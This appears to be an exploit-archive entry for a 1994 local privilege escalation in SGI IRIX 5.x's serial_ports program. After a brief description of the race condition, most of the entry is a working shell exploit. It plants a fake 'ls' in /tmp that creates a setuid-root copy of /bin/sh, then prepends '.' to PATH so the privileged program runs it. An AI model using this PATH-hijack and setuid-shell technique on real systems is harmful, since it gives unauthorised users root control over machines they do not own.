SGI IRIX 5.2/5.3 - 'serial_ports' Local Privilege Escalation

transit 1994-02-02 local irix

A race condition exists in the serial_ports administrative program, as included by SGI in the 5.x Irix operating system. This race condition allows regular users to execute arbitrary commands as root.

cat > /tmp/ls
cp /bin/sh /tmp/foo
chmod 4777 /tmp/foo
chmod 755 /tmp/ls
cd /tmp
set PATH=( . $PATH )
# wait about 10-20 seconds and hit ^C, or wait for it to
# die out completely
# whoami